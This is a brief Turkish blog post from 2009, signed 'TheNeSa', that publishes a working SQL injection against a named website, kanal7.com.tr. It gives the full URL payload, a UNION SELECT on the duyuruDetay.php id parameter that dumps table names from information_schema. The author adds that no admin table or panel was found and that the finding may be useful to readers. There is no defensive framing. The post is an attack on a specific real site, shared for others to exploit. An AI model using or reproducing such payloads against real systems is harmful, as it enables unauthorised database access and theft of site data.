10 Temmuz 2009 Cuma

www.kanal7.com.tr sql injection

Site:

http://www.kanal7.com.tr/

Sql:

http://www.kanal7.com.tr/duyuruDetay.php?id=9%20and%201=2%20
union%20select%201,group_concat(table_name),unhex(hex(group_concat(table_name))),4,
group_concat(table_name),6+from+information_schema.tables--

işte tablo adları admin tablosu yok saten panelde yok belki
işinize yarayabilir ne sql die sormayın blind mysql.

by TheNeSa

Hiç yorum yok:

Yorum Gönder